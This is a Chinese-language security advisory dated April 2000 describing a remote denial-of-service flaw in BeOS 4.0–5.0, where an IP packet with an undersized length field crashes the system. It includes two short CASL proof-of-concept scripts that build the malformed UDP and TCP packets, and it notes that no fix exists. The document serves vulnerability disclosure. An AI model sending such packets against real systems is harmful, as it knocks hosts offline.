BeOS IP信息包长度的域存在漏洞

发布时间：2000-04-13
更新时间：2000-04-13
严重程度：高
威胁程度：远程拒绝服务
错误类型：设计错误
利用方式：服务器模式

受影响系统

BeOS 5.0；Be BeOS 4.0；Be BeOS 4.5

详细描述
如果一部分不正常的信息包传输给进行网络处理的BeOS系统，这样操作系统将崩溃。如果长度域设置一个比IP总长度和协议头长度总和小的话，进程将被挂起，并必须手工重启动来获得正常功能。TCP信息包的TCP协议和IP头长度之和为40 ，而UDP信息包TCP协议和IP头长度和为28

测试代码
#!/usr/local/casl/bin/casl

    #include "tcpip.casl"
    #include "packets.casl"
    #include "tcp.casl"

    srchost = 10.0.0.1;
    dsthost = 10.0.0.2;

    IPH = copy UDPIP;

    IPH.ip_hl = 5;
    IPH.ip_src = srchost;
    IPH.ip_dst = dsthost;
    IPH.ip_length = 27;

FOR TCP：

#!/usr/local/casl/bin/casl

    #include "tcpip.casl"
    #include "packets.casl"
    #include "tcp.casl"

    srchost = 10.0.0.1;
    dsthost = 10.0.0.2;

    IPH = copy TCPIP;

    IPH.ip_hl = 5;
    IPH.ip_src = srchost;
    IPH.ip_dst = dsthost;
    IPH.ip_length = 39;

解决方案
暂无

相关信息

最近严重漏洞

BeOS IP信息包长度的域存在漏洞